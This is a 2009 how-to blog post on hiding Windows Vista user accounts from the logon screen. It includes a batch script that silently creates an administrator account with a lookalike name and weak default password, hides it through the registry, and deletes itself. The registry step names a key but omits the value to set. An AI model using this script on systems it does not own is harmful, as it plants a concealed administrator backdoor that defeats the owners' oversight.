How To: Create A Hidden User Account In Windows Vista

vista_user-account-controlMicrosoft’s Windows operating systems including Windows Vista and Windows XP allows multiple user accounts to be created on the computer, be it administrators or standard users. When there is more than one user accounts been defined and created on the computer, Windows operating system will display Welcome Screen, with all available user accounts listed so that user can click and login.

The following simple registry tweak allows to create a hidden user account in Windows Vista. This user account won’t displayed on the Windows Vista Welcome screen.

HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon \SpecialAccounts\UserList

To login into Windows using an user account that has made hidden and invisible, just press Ctrl+Alt+Del to bring up Windows Logon dialog, and then type in the user name and password manually. While the account is hidden on the Welcome screen, that the account profile will be visible in C:\Documents and Settings or as well as in Local Users and Groups.

Warning: Modifying the Windows registry can cause serious damage to your Windows Operating System.It is better to backup your Windows registry data before making any changes. Tomstricks.com is not responsible for any changes you may make to your system.

Bonus Tips:

You can also hide a user account in Windows Vista as follows:

Here also includes a batch script(.bat) that will create user who’s account will be hidden from the Windows logon screen and the User Accounts screen in control panel. This batch file will only work if its ran from an account that has admin rights. It’s great for a backup account.

@echo off
rem This will create a hidden user with admin rights in XP/Vista
rem change the Aministrat0r & passw0rd to your own
rem Once you log into your new account dont forget to hide the user folder
rem “attrib +r +a +s +h %USERPROFILE%”

SET NEWUSER=Administrat0r
SET PASS=passw0rd

net user %NEWUSER% %PASS% /add && net localgroup administrators %NEWUSER% /add>nul 2>&1
reg.exe ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v %NEWUSER% /t REG_DWORD /d 0 /f>nul 2>&1
DEL %0

Share and Enjoy:
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google

Popularity: 5%

Did You Like This Post? Then You Might Find These Also Interesting:

Written by Tony on May 27th, 2009 with 1 comment.
Read more articles on Vista How To?.

Related articles

1 comment

Read the comments left by other users below, or:

Get your own gravatar by visiting gravatar.com Annette Relation
#1. July 16th, 2009, at 1:27 PM.

I am so glad that I found this blog :) ) I try to resolve my problem but unfortunately I can’t do it, but now you are here and will help me :)

Leave your comment...

If you want to leave your comment on this article, simply fill out the next form:




You can use these XHTML tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> .